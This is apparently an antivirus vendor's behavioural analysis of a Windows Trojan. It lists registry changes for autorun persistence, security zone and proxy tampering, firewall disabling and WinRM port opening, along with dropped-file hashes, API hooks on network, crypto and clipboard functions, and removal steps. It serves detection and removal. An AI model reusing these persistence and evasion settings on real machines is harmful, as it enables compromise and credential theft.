"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"0494a3ce" = "1442757180"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 F0 14 C2 8F EA B5 14 E4 A6 53 3C BD 8F 71 BD"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
"5232108f" = "ÈwûFª2°p~,¤eŒ@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK«8GÝt9mFù„z˜-ßô‚]ꨧÖ×mà`fhêç‡/«hÜ°remIèÑyDÈ6 ˆŸG”ô?1˜ußXV@@¿°2iVT©Ðãà¯ÉÛ)ŠÕ9NœJ:4ÒŠm¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&”š®Ø©(;°REø¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGÝ¡=ž=B±‡uÕµyáC91wo{¢Aû8oò¨ƒ@‹^×Ádð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûŠ¦YÙ]½oes¶‹´"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1442757180"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:3404 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 D2 64 B9 07 33 33 10 81 22 6C 05 95 05 A8 AE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E" = "D43673142A7803D5E"

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2" = "DEF5A832C6F4203B2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
[HKLM\SOFTWARE\BC91AD57E73BCB11448]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

The process regsvr32.exe:3200 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 9B 33 0E AA E1 AE 01 AB AA 92 34 F2 AD DA 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process wsmanhttpconfig.exe:3232 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 74 09 EA 1C 03 27 B8 EF A7 47 AA A5 7F 1C 7E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process wsmanhttpconfig.exe:1960 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 70 27 85 1A FF 0E 1F 70 1A 1D 36 51 E7 59 47"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "D43F50A7-7CCC-43E7-9E47-8D49C8B4D82A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process netsh.exe:2304 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 2B BC DB F3 4F AE E6 9B E1 BF C4 D2 AC D2 EC"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

The process bindata865.exe:3088 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 0A 06 0C F8 80 1C B1 1C 78 63 AA 64 40 B3 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

Dropped PE files

MD5 File path
40bafdbf7f27041cef77b05441f9b0c4c:\Documents and Settings\"%CurrentUserName%"\Application Data\Olifiqtu\yfenaromaf.exe
6f2813669b17c1d1a74507d352b126d8c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\fadehi\fadehi.exe
9859a26d5e72bbb0685af813b409d99dc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
d510b5b91adbf3479ef0adc04f00e34cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmp4d895b52\new.exe
85d7ab466d0577c49fc9879107ec7ef5c:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll
2f7fe3a781ba8c0a67c775f20e3e9f70c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll
173d3dd1425a8e33fa1d4ed71067a3a2c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll
75c183e262bd4400eb0f20349f6ef383c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll
08e87e8abf7b41b28663dce817ce0ab6c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll
4e2482e69baaf3a5b13db8101c063ebfc:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll
f3ac3f844f90380aab2b4c0836c4288fc:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll
b87e087fc013225e2aa1cb60c080647dc:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll
dfeb401cc051e5da721c584ff6a90f88c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll
1ce73fb3f88c716cfc3fd550547d2b35c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll
3991b7fa452a9c9c291c06365a236792c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll
36ff641f37918f2cca98e7f407ac4d75c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll
208fa9d0ebe2ceb9616042772e96598ec:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll
37bed865557084dd9988350ab1675e0bc:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll
d4eefccdc3de6ced901535fa4153c491c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll
108500a98b9a2f66823e7615398fc87bc:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll
5a69fb5d686f863e0e13268d671ef16dc:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll
53a9d748ef09920a0d06da2583c298adc:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll
c7a0d1321a67a2afd330c5fbe79befd1c:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll
1a4e900c2fe3cd31d10107670d184fe6c:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll
6372ea7d2aced7185183cf3fcdd3577bc:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll
f7da27672d2e4c21a1f996ee31de0dbfc:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll
df4217ddb34a0b73dc7aac7829371c0cc:\ea4acb66495575d6b9f323\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8c:\ea4acb66495575d6b9f323\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9fc:\ea4acb66495575d6b9f323\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3c:\ea4acb66495575d6b9f323\powershell_ise.resources.dll
fc9a05096522bb6d7ceda62ea1707420c:\ea4acb66495575d6b9f323\pscustomsetuputil.exe
95b7f12a557dedac5e4a1e9afa5e73abc:\ea4acb66495575d6b9f323\pspluginwkr.dll
35efd8cd6549a4339cb2a28c8cfd6598c:\ea4acb66495575d6b9f323\pssetupnativeutils.exe
a94243b797377ba03b63fc716c13bcf5c:\ea4acb66495575d6b9f323\pwrshmsg.dll
8c386819bf5b39d7a4b274d0b55f87a5c:\ea4acb66495575d6b9f323\pwrshplugin.dll
7943a80f1a6fd37969aacd411b511f91c:\ea4acb66495575d6b9f323\pwrshsip.dll
066f7fcca265d01a5b7eaf41ade789b1c:\ea4acb66495575d6b9f323\spmsg.dll
a39df582ca051afc8811fbd00db12f10c:\ea4acb66495575d6b9f323\spuninst.exe
1b2c60a6d6c3833b413943862b2bfed8c:\ea4acb66495575d6b9f323\spupdsvc.exe
4d8ab4fad244f7985d8c59d456e026d7c:\ea4acb66495575d6b9f323\system.management.automation.dll
2286b57ecc2d32d24049c51989084268c:\ea4acb66495575d6b9f323\system.management.automation.resources.dll
5d6d17b645fa91fce7f0712f3da4f297c:\ea4acb66495575d6b9f323\update\spcustom.dll
50914702cb6c72275018643c557ef8c5c:\ea4acb66495575d6b9f323\update\update.exe
9a055da2f2819f155c33d47cd67a7c00c:\ea4acb66495575d6b9f323\update\updspapi.dll
84e025b1259c66315f4d45a6caecacc9c:\ea4acb66495575d6b9f323\wevtfwd.dll
cd17705af8e53a82facb545a213ab09cc:\ea4acb66495575d6b9f323\winrmprov.dll
afdf7654880ce23005014895b129d948c:\ea4acb66495575d6b9f323\winrs.exe
3e9b11880ae4a8ff399ce0573c82655bc:\ea4acb66495575d6b9f323\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991c:\ea4acb66495575d6b9f323\winrshost.exe
b84092e52861a026fc83bcede4a7abfac:\ea4acb66495575d6b9f323\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1c:\ea4acb66495575d6b9f323\winrssrv.dll
972916faac89c4aa978952b30f478e81c:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe
2c9c9ae86eb2b4e78c8e09deb7509a63c:\ea4acb66495575d6b9f323\wsmauto.dll
23ce21efc2ae95700f2b1f9582fe3867c:\ea4acb66495575d6b9f323\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2c:\ea4acb66495575d6b9f323\wsmprovhost.exe
67146d3606be1111a39f0fd61f47e9b6c:\ea4acb66495575d6b9f323\wsmres.dll
18f347402da544a780949b8fdf83351bc:\ea4acb66495575d6b9f323\wsmsvc.dll
296e6992278fea7140d88b603e6c2a8ac:\ea4acb66495575d6b9f323\wsmwmipl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WININET.dll:

HttpEndRequestW
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetSetFilePointer
InternetQueryDataAvailable
HttpOpenRequestW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpOpenRequestA

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
PeekMessageW
GetMessageW

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW
RegQueryValueExA
RegQueryValueExW

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
gethostbyname
send
closesocket
getaddrinfo

The Trojan installs the following user-mode hooks in kernel32.dll:

ExitProcess
GetFileAttributesExW

The Trojan installs the following user-mode hooks in ntdll.dll:

NtCreateThread

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1480
    mofcomp.exe:3476
